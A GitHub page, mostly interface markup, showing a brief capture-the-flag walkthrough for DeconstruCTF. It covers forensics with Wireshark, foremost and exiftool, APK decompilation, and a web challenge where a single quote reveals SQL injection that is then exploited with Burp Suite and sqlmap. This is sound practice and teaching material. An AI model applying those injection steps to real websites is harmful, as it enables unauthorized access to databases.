1.06l-3.04-3.04z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> <span> In this user </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
</div> </label></form> </div></div>
</div>
<div class="position-relative mr-3 mb-4 mb-lg-0 d-inline-block"> Sign in </div>
Sign up </div> </div> </div></header>
</div>
<div id="start-of-content" class="show-on-focus"></div>
<div data-pjax-replace id="js-flash-container">
<template class="js-flash-template"> <div class="flash flash-full {{ className }}"> <div class=" px-2" > <button class="flash-close js-flash-close" type="button" aria-label="Dismiss this message"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg> </button> <div>{{ message }}</div>
</div></div> </template></div>
<include-fragment class="js-notification-shelf-include-fragment" data-base-src="https://github.com/notifications/beta/shelf"></include-fragment>
<div class="application-main " data-commit-hovercards-enabled data-discussion-hovercards-enabled data-issue-and-pr-hovercards-enabled > <div itemscope itemtype="http://schema.org/SoftwareSourceCode" class=""> <main id="js-repo-pjax-container" data-pjax-container >
<div id="repository-container-header" class="pt-3 hide-full-screen mb-5" style="background-color: var(--color-page-header-bg);" data-pjax-replace>
<div class="d-flex mb-3 px-3 px-md-4 px-lg-5">
<div class="flex-auto min-width-0 width-fit mr-3"> <h1 class=" d-flex flex-wrap flex-items-center wb-break-word f3 text-normal"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo color-icon-secondary mr-2"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <span> deepakdhayal </span> <span>/</span> DeconstruCTF
<span></span><span>Public</span></h1>
</div>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell"> <path d="M8 16a2 2 0 001.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 008 16z"></path><path fill-rule="evenodd" d="M8 1.5A3.5 3.5 0 004.5 5v2.947c0 .346-.102.683-.294.97l-1.703 2.556a.018.018 0 00-.003.01l.001.006c0 .002.002.004.004.006a.017.017 0 00.006.004l.007.001h10.964l.007-.001a.016.016 0 00.006-.004.016.016 0 00.004-.006l.001-.007a.017.017 0 00-.003-.01l-1.703-2.554a1.75 1.75 0 01-.294-.97V5A3.5 3.5 0 008 1.5zM3 5a5 5 0 0110 0v2.947c0 .05.015.098.042.139l1.703 2.555A1.518 1.518 0 0113.482 13H2.518a1.518 1.518 0 01-1.263-2.36l1.703-2.554A.25.25 0 003 7.947V5z"></path></svg> Notifications
<div > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star v-align-text-bottom mr-1"> <path fill-rule="evenodd" d="M8 .25a.75.75 0 01.673.418l1.882 3.815 4.21.612a.75.75 0 01.416 1.279l-3.046 2.97.719 4.192a.75.75 0 01-1.088.791L8 12.347l-3.766 1.98a.75.75 0 01-1.088-.79l.72-4.194L.818 6.374a.75.75 0 01.416-1.28l4.21-.611L7.327.668A.75.75 0 018 .25zm0 2.445L6.615 5.5a.75.75 0 01-.564.41l-3.097.45 2.24 2.184a.75.75 0 01.216.664l-.528 3.084 2.769-1.456a.75.75 0 01.698 0l2.77 1.456-.53-3.084a.75.75 0 01.216-.664l2.24-2.183-3.096-.45a.75.75 0 01-.564-.41L8 2.694v.001z"></path></svg> <span> Star</span>
0 </div>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo-forked"> <path fill-rule="evenodd" d="M5 3.25a.75.75 0 11-1.5 0 .75.75 0 011.5 0zm0 2.122a2.25 2.25 0 10-1.5 0v.878A2.25 2.25 0 005.75 8.5h1.5v2.128a2.251 2.251 0 101.5 0V8.5h1.5a2.25 2.25 0 002.25-2.25v-.878a2.25 2.25 0 10-1.5 0v.878a.75.75 0 01-.75.75h-4.5A.75.75 0 015 6.25v-.878zm3.75 7.378a.75.75 0 11-1.5 0 .75.75 0 011.5 0zm3-8.75a.75.75 0 100-1.5.75.75 0 000 1.5z"></path></svg> Fork
0
</div>
<div id="responsive-meta-container" data-pjax-replace></div>
<nav data-pjax="#js-repo-pjax-container" aria-label="Repository" data-view-component="true" class="js-repo-nav js-sidenav-container-pjax js-responsive-underlinenav overflow-hidden UnderlineNav px-3 px-md-4 px-lg-5">
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M4.72 3.22a.75.75 0 011.06 1.06L2.06 8l3.72 3.72a.75.75 0 11-1.06 1.06L.47 8.53a.75.75 0 010-1.06l4.25-4.25zm6.56 0a.75.75 0 10-1.06 1.06L13.94 8l-3.72 3.72a.75.75 0 101.06 1.06l4.25-4.25a.75.75 0 000-1.06l-4.25-4.25z"></path></svg> <span>Code</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 9.5a1.5 1.5 0 100-3 1.5 1.5 0 000 3z"></path><path fill-rule="evenodd" d="M8 0a8 8 0 100 16A8 8 0 008 0zM1.5 8a6.5 6.5 0 1113 0 6.5 6.5 0 01-13 0z"></path></svg> <span>Issues</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-pull-request UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M7.177 3.073L9.573.677A.25.25 0 0110 .854v4.792a.25.25 0 01-.427.177L7.177 3.427a.25.25 0 010-.354zM3.75 2.5a.75.75 0 100 1.5.75.75 0 000-1.5zm-2.25.75a2.25 2.25 0 113 2.122v5.256a2.251 2.251 0 11-1.5 0V5.372A2.25 2.25 0 011.5 3.25zM11 2.5h-1V4h1a1 1 0 011 1v5.628a2.251 2.251 0 101.5 0V5A2.5 2.5 0 0011 2.5zm1 10.25a.75.75 0 111.5 0 .75.75 0 01-1.5 0zM3.75 12a.75.75 0 100 1.5.75.75 0 000-1.5z"></path></svg> <span>Pull requests</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M1.5 8a6.5 6.5 0 1113 0 6.5 6.5 0 01-13 0zM8 0a8 8 0 100 16A8 8 0 008 0zM6.379 5.227A.25.25 0 006 5.442v5.117a.25.25 0 00.379.214l4.264-2.559a.25.25 0 000-.428L6.379 5.227z"></path></svg> <span>Actions</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <span>Projects</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-book UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M0 1.75A.75.75 0 01.75 1h4.253c1.227 0 2.317.59 3 1.501A3.744 3.744 0 0111.006 1h4.245a.75.75 0 01.75.75v10.5a.75.75 0 01-.75.75h-4.507a2.25 2.25 0 00-1.591.659l-.622.621a.75.75 0 01-1.06 0l-.622-.621A2.25 2.25 0 005.258 13H.75a.75.75 0 01-.75-.75V1.75zm8.755 3a2.25 2.25 0 012.25-2.25H14.5v9h-3.757c-.71 0-1.4.201-1.992.572l.004-7.322zm-1.504 7.324l.004-5.073-.002-2.253A2.25 2.25 0 005.003 2.5H1.5v9h3.757a3.75 3.75 0 011.994.574z"></path></svg> <span>Wiki</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M7.467.133a1.75 1.75 0 011.066 0l5.25 1.68A1.75 1.75 0 0115 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.7 1.7 0 01-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 011.217-1.667l5.25-1.68zm.61 1.429a.25.25 0 00-.153 0l-5.25 1.68a.25.25 0 00-.174.238V7c0 1.358.275 2.666 1.057 3.86.784 1.194 2.121 2.34 4.366 3.297a.2.2 0 00.154 0c2.245-.956 3.582-2.104 4.366-3.298C13.225 9.666 13.5 8.36 13.5 7V3.48a.25.25 0 00-.174-.237l-5.25-1.68zM9 10.5a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.75a.75.75 0 10-1.5 0v3a.75.75 0 001.5 0v-3z"></path></svg> <span>Security</span> <include-fragment src="/deepakdhayal/DeconstruCTF/security/overall-count" accept="text/fragment+html"></include-fragment>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-graph UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M1.5 1.75a.75.75 0 00-1.5 0v12.5c0 .414.336.75.75.75h14.5a.75.75 0 000-1.5H1.5V1.75zm14.28 2.53a.75.75 0 00-1.06-1.06L10 7.94 7.53 5.47a.75.75 0 00-1.06 0L3.22 8.72a.75.75 0 001.06 1.06L7 7.06l2.47 2.47a.75.75 0 001.06 0l5.25-5.25z"></path></svg> <span>Insights</span> <span></span>
<div style="visibility:hidden;" data-view-component="true" class="UnderlineNav-actions js-responsive-underlinenav-overflow position-absolute pr-3 pr-md-4 pr-lg-5 right-0"> <details data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true"> <div class="UnderlineNav-item mr-0 border-0"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zM1.5 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zm13 0a1.5 1.5 0 100-3 1.5 1.5 0 000 3z"></path></svg> <span>More</span> </div></summary> <div data-view-component="true"> <details-menu role="menu" data-view-component="true" class="dropdown-menu dropdown-menu-sw"> Code Issues Pull requests Actions Projects Wiki Security Insights
</details-menu></div></details></div></nav> </div>
<div class="clearfix new-discussion-timeline container-xl px-3 px-md-4 px-lg-5"> <div id="repo-content-pjax-container" class="repository-content " >
<div>
Permalink
<div class="d-flex flex-items-start flex-shrink-0 pb-3 flex-wrap flex-md-nowrap flex-justify-between flex-md-justify-start"> <div class="position-relative"> <details class="details-reset details-overlay mr-0 mb-0 " id="branch-select-menu"> <summary class="btn css-truncate" data-hotkey="w" title="Switch branches or tags"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-branch"> <path fill-rule="evenodd" d="M11.75 2.5a.75.75 0 100 1.5.75.75 0 000-1.5zm-2.25.75a2.25 2.25 0 113 2.122V6A2.5 2.5 0 0110 8.5H6a1 1 0 00-1 1v1.128a2.251 2.251 0 11-1.5 0V5.372a2.25 2.25 0 111.5 0v1.836A2.492 2.492 0 016 7h4a1 1 0 001-1v-.628A2.25 2.25 0 019.5 3.25zM4.25 12a.75.75 0 100 1.5.75.75 0 000-1.5zM3.5 3.25a.75.75 0 111.5 0 .75.75 0 01-1.5 0z"></path></svg> <span>Master</span> <span></span> </summary>
<div class="SelectMenu"> <div class="SelectMenu-modal"> <header class="SelectMenu-header"> <span>Switch branches/tags</span> <button class="SelectMenu-closeButton" type="button" data-toggle-for="branch-select-menu"><svg aria-label="Close menu" aria-hidden="false" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg></button> </header>
<input-demux data-action="tab-container-change:input-demux#storeInput tab-container-changed:input-demux#updateInput"> <tab-container class="d-flex flex-column js-branches-tags-tabs" style="min-height: 0;"> <div class="SelectMenu-filter"> <input data-target="input-demux.source" id="context-commitish-filter-field" class="SelectMenu-input form-control" aria-owns="ref-list-branches" data-controls-ref-menu-id="ref-list-branches" autofocus autocomplete="off" aria-label="Filter branches/tags" placeholder="Filter branches/tags" type="text" > </div>
<div class="SelectMenu-tabs" role="tablist" data-target="input-demux.control" > <button class="SelectMenu-tab" type="button" role="tab" aria-selected="true">Branches</button> <button class="SelectMenu-tab" type="button" role="tab">Tags</button> </div>
<div role="tabpanel" id="ref-list-branches" data-filter-placeholder="Filter branches/tags" class="d-flex flex-column flex-auto overflow-auto" tabindex=""> <ref-selector type="branch" data-targets="input-demux.sinks" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " query-endpoint="/deepakdhayal/DeconstruCTF/refs" cache-key="v0:1633153604.597844" current-committish="TWFzdGVy" default-branch="TWFzdGVy" name-with-owner="ZGVlcGFrZGhheWFsL0RlY29uc3RydUNURg==" prefetch-on-mouseover >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load branches</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message">Nothing to show</div></template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list " style="max-height: 330px" data-pjax="#repo-content-pjax-container"> <div class="SelectMenu-loading pt-3 pb-0" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<footer class="SelectMenu-footer">View all branches</footer> </ref-selector>
</div>
<div role="tabpanel" id="tags-menu" data-filter-placeholder="Find a tag" class="d-flex flex-column flex-auto overflow-auto" tabindex="" hidden> <ref-selector type="tag" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " data-targets="input-demux.sinks" query-endpoint="/deepakdhayal/DeconstruCTF/refs" cache-key="v0:1633153604.597844" current-committish="TWFzdGVy" default-branch="TWFzdGVy" name-with-owner="ZGVlcGFrZGhheWFsL0RlY29uc3RydUNURg==" >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load tags</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Nothing to show</div> </template>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list" style="max-height: 330px" data-pjax="#repo-content-pjax-container"> <div class="SelectMenu-loading pt-3 pb-0" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div> <footer class="SelectMenu-footer">View all tags</footer> </ref-selector> </div> </tab-container> </input-demux> </div></div>
</details>
</div>
<h2 id="blob-path" class="breadcrumb flex-auto flex-self-center min-width-0 text-normal mx-2 width-full width-md-auto flex-order-1 flex-md-order-none mt-3 mt-md-0"> <span><span><span>DeconstruCTF</span></span></span><span>/</span>WalkThrough.md </h2> Go to file
<details id="blob-more-options-details" data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true" class="btn"> <svg aria-label="More options" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zM1.5 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zm13 0a1.5 1.5 0 100-3 1.5 1.5 0 000 3z"></path></svg>
</summary> <div data-view-component="true"> <span>Go to file</span> <span>T</span> <button data-toggle-for="jumpto-line-details-dialog" type="button" data-view-component="true" class="dropdown-item btn-link"> <span> <span>Go to line</span> <span>L</span> </span>
</button> <clipboard-copy data-toggle-for="blob-more-options-details" aria-label="Copy path" value="WalkThrough.md" data-view-component="true" class="dropdown-item cursor-pointer"> Copy path
</clipboard-copy> <clipboard-copy data-toggle-for="blob-more-options-details" aria-label="Copy permalink" value="https://github.com/deepakdhayal/DeconstruCTF/blob/3c6a6b741bbeb327bf484529d6dfcb4acda3fd24/WalkThrough.md" data-view-component="true" class="dropdown-item cursor-pointer"> <span> <span>Copy permalink</span> </span>
</clipboard-copy> </div></details> </div>
<div class="Box d-flex flex-column flex-shrink-0 mb-3"> <include-fragment src="/deepakdhayal/DeconstruCTF/contributors/Master/WalkThrough.md" class="commit-loader"> <div class="Box-header d-flex flex-items-center"> <div class="Skeleton avatar avatar-user flex-shrink-0 ml-n1 mr-n1 mt-n1 mb-n1" style="width:24px;height:24px;"></div> <div class="Skeleton Skeleton--text col-5 ml-2"> </div> </div>
<div class="Box-body d-flex flex-items-center" > <div class="Skeleton Skeleton--text col-1"> </div> <span>Cannot retrieve contributors at this time</span> </div></include-fragment> </div>
<div data-target="readme-toc.content" class="Box mt-3 position-relative"> <div class="Box-header py-2 pr-2 d-flex flex-shrink-0 flex-md-row flex-items-center" >
<div class="text-mono f6 flex-auto pr-3 flex-order-2 flex-md-order-1">
89 lines (48 sloc) <span></span> 3.39 KB </div>
<div class="d-flex py-1 py-md-0 flex-auto flex-order-1 flex-md-order-2 flex-sm-grow-0 flex-justify-between hide-sm hide-md"> <div class="BtnGroup"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code"> <path fill-rule="evenodd" d="M4.72 3.22a.75.75 0 011.06 1.06L2.06 8l3.72 3.72a.75.75 0 11-1.06 1.06L.47 8.53a.75.75 0 010-1.06l4.25-4.25zm6.56 0a.75.75 0 10-1.06 1.06L13.94 8l-3.72 3.72a.75.75 0 101.06 1.06l4.25-4.25a.75.75 0 000-1.06l-4.25-4.25z"></path></svg>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file"> <path fill-rule="evenodd" d="M3.75 1.5a.25.25 0 00-.25.25v11.5c0 .138.112.25.25.25h8.5a.25.25 0 00.25-.25V6H9.75A1.75 1.75 0 018 4.25V1.5H3.75zm5.75.56v2.19c0 .138.112.25.25.25h2.19L9.5 2.06zM2 1.75C2 .784 2.784 0 3.75 0h5.086c.464 0 .909.184 1.237.513l3.414 3.414c.329.328.513.773.513 1.237v8.086A1.75 1.75 0 0112.25 15h-8.5A1.75 1.75 0 012 13.25V1.75z"></path></svg>
</div>
<div class="BtnGroup"> Raw
Blame
</div>
<div> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-device-desktop"> <path fill-rule="evenodd" d="M1.75 2.5h12.5a.25.25 0 01.25.25v7.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25v-7.5a.25.25 0 01.25-.25zM14.25 1H1.75A1.75 1.75 0 000 2.75v7.5C0 11.216.784 12 1.75 12h3.727c-.1 1.041-.52 1.872-1.292 2.757A.75.75 0 004.75 16h6.5a.75.75 0 00.565-1.243c-.772-.885-1.193-1.716-1.292-2.757h3.727A1.75 1.75 0 0016 10.25v-7.5A1.75 1.75 0 0014.25 1zM9.018 12H6.982a5.72 5.72 0 01-.765 2.5h3.566a5.72 5.72 0 01-.765-2.5z"></path></svg>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-pencil"> <path fill-rule="evenodd" d="M11.013 1.427a1.75 1.75 0 012.474 0l1.086 1.086a1.75 1.75 0 010 2.474l-8.61 8.61c-.21.21-.47.364-.756.445l-3.251.93a.75.75 0 01-.927-.928l.929-3.25a1.75 1.75 0 01.445-.758l8.61-8.61zm1.414 1.06a.25.25 0 00-.354 0L10.811 3.75l1.439 1.44 1.263-1.263a.25.25 0 000-.354l-1.086-1.086zM11.189 6.25L9.75 4.81l-6.286 6.287a.25.25 0 00-.064.108l-.558 1.953 1.953-.558a.249.249 0 00.108-.064l6.286-6.286z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-trash"> <path fill-rule="evenodd" d="M6.5 1.75a.25.25 0 01.25-.25h2.5a.25.25 0 01.25.25V3h-3V1.75zm4.5 0V3h2.25a.75.75 0 010 1.5H2.75a.75.75 0 010-1.5H5V1.75C5 .784 5.784 0 6.75 0h2.5C10.216 0 11 .784 11 1.75zM4.496 6.675a.75.75 0 10-1.492.15l.66 6.6A1.75 1.75 0 005.405 15h5.19c.9 0 1.652-.681 1.741-1.576l.66-6.6a.75.75 0 00-1.492-.149l-.66 6.6a.25.25 0 01-.249.225h-5.19a.25.25 0 01-.249-.225l-.66-6.6z"></path></svg> </div> </div>
<div class="d-flex hide-lg hide-xl flex-order-2 flex-grow-0"> <details class="dropdown details-reset details-overlay d-inline-block"> <summary class="btn-octicon" aria-haspopup="true" aria-label="possible actions"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zM1.5 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zm13 0a1.5 1.5 0 100-3 1.5 1.5 0 000 3z"></path></svg> </summary>
Open with Desktop View raw View blame
</details> </div></div>
<div id="readme" class="Box-body readme blob js-code-block-container p-5 p-xl-6 gist-border-0"> <article class="markdown-body entry-content container-lg" itemprop="text"><h1><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg>DeconstruCTF</h1>WalkThroughThis is my First Time writting a walkthrough. There can be mistakes. Suggestions are Welcomed.##Piratesopen file in wireshark.network_listen.pcap.zipFollow TCP stream.##The Missing JournalistFile can be downloaded here.the_journalist.gif.zipExtract the file.Using foremost tool, you can see another PDF.using Exiftool you can see a base64 string which is used as password for the last pdf.##Taxi Union ProblemsThere is only one input field in the website.2.If we put an (') in the field we can see an error. Its an SQL injection. Sql Injection Verified.Intercept the request in burpsuit.copy the request and save it in a file and use SQLmap.Location is being displayed in the last image. Use the hint no caps.##RSA - 1##RSA - 2##ScrapsBase64 Decode##Failed LoginsMy approach might not be correct but it worked in this case.1.Rename the apk file:::: using ---mv chall.apk chall.zipd2j-dex2jar -d chall.zipjd-gui chall-dex2jar.jar</article> </div>
WalkThroughThis is my First Time writting a walkthrough. There can be mistakes. Suggestions are Welcomed.
##Pirates
##The Missing Journalist
##Taxi Union Problems
2.If we put an (') in the field we can see an error. Its an SQL injection. Sql Injection Verified.
##RSA - 1
##RSA - 2
##Scraps
Base64 Decode
